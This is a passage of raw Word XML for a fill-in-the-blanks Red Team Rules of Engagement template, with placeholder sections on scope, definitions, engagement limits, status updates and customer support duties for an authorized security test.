    <w:p w14:paraId="3CC7BC99" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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HIPAA ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559B09C1" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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ISO...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D21897" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>SCOPE</w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:anchor="scope" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12062CC7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>This agreement is applicable to [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">business, customer, system, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> for the receipt of Red Team activities. This document will establish the guidelines, limitations, and restrictions for conducting a Red Team engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F0928E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>DEFINITIONS</w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:anchor="definitions" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55331745" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Short definition of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>terms</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2410890F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>RULES OF ENGAGEMENT AND SUPPORT AGREEMENT</w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:anchor="rules-of-engagement-and-support-agreement" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2966D9DF" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>a. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> has been agreed upon to conduct a Red Team engagement and supporting Red Team activities. This document provides the ground rules for planning, executing and reporting the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0F62F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>b. [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Short description of the services requested and information about the requesting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>. The following systems, networks and/or assets will be included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB14F6E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">List of business/organization systems and networks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>included</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F40E714" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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All software and hardware included as a target during the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EDEC58" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>c. The Red Team will [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">list of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>activities</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D90AC08" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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The engagement is designed to [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>objectives</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This means the system must [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whatever the objectives are designed to test/assess/evaluate/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stress</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224945B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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For the Red Team, an open network will be utilized. An open network is defined as a network with access to the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C652A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Engagement activities will be conducted using scenarios detailed in the Threat Profile [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A1CAA2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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The customer is responsible for [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">List of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E7828A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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There will be complete and open coordination with all stakeholders required for engagement execution. Stakeholders are the parties represented by the signatories of this document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87D23B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Red Team activities are limited to the target of engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61990310" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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 xml:space="preserve">Red Team tools and activities may be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intrusive, but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will not intentionally disrupt services outside the authorizations of these Rules of Engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461770A7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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The Red Team will provide [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> updates ([ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list each</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]) as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C498978" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Update 1: [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C2B690D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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Update 2: [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="286A1B39" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>d. [ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Customer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> will: [ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Include list of responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A32B28" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Provide the Red Team administrative facilities and support for all team personnel as necessary to conduct the engagement (if on-site).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB6204" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Provide support with network and resources for conducting the engagement, including adequate workspace (quiet facility), network drops and power connections for the Red Team’s systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AC0E0A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Provide IP address ranges and administrative support for target of engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A386A0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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Coordinate support of Red Team activities, with the appropriate stakeholders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19707EAB" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
